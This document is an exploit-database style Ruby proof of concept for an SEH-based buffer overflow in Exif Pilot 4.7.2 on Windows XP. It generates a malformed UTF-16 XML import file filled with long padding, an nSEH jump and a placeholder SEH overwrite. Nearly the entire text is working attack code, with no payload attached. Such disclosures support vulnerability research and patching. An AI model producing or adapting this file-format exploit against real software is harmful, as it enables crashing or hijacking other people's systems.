Exif Pilot 4.7.2 Buffer Overflow

`#!/usr/bin/env ruby  
# Exploit Title: Exif Pilot SEH Based Buffer Overflow  
# Version: version 4.7.2  
# Download: http://www.colorpilot.com/load/exif.exe  
# Tested on: Windows XP sp2  
# Exploit Author: Osanda M. Jayathissa  
# E-Mail: osanda[cat]unseen.is   
  
=begin  
Click Tools > Options > Customize 35mm tab > Import > and choose "output.xml".  
The p/p/r addresses contains null characters.   
=end  
require 'rex'  
  
def generate_content(padding1_len, padding2_len)  
header = "\xff\xfe"  
header << Rex::Text.to_unicode("<?xml version=\"1.0\" encoding=\"UTF-16\" ?>")  
header << "\x0d\x00\x0a\x00"  
header << Rex::Text.to_unicode("<efls>")  
header << "\x0d\x00\x0a\x00"  
header << Rex::Text.to_unicode(" <eflitem>")  
header << "\x0d\x00\x0a\x00"  
header << Rex::Text.to_unicode(" <maker>");  
header << Rex::Text.to_unicode("");  
  
for i in 0..padding1_len  
header << Rex::Text.to_unicode("A");  
end  
  
header << "\xeb\x00\x06\x00\x90\x00\x90\x00" #nSEH  
header << Rex::Text.to_unicode("CCCC"); #SEH  
  
for i in 0..padding2_len  
header << Rex::Text.to_unicode("A");  
end  
  
header << "\x0d\x00\x0a\x00\x09\x00\x09\x00"  
header << Rex::Text.to_unicode(" </maker>")  
header << "\x0d\x00\x0a\x00"  
header << Rex::Text.to_unicode(" <model>abc</model>")  
header << "\x0d\x00\x0a\x00"  
header << Rex::Text.to_unicode(" <factor>0.000000</factor>")  
header << "\x0d\x00\x0a\x00"  
header << Rex::Text.to_unicode(" </eflitem>")  
header << "\x0d\x00\x0a\x00"  
header << Rex::Text.to_unicode("</efls>")  
header << "\x0d\x00\x0a\x00"  
return header  
end  
  
##  
# main  
##  
  
filename = 'output.xml'  
output_handle = File.new(filename, 'wb')  
if !output_handle  
$stdout.puts "Cannot open the file #{filename} for writing!"  
exit -1  
end  
  
header = generate_content(1619, 7000)  
  
$stdout.puts "Generating file #{filename}"  
output_handle.puts header  
output_handle.close  
  
$stdout.puts "Done!"  
exit 0  
#EOF`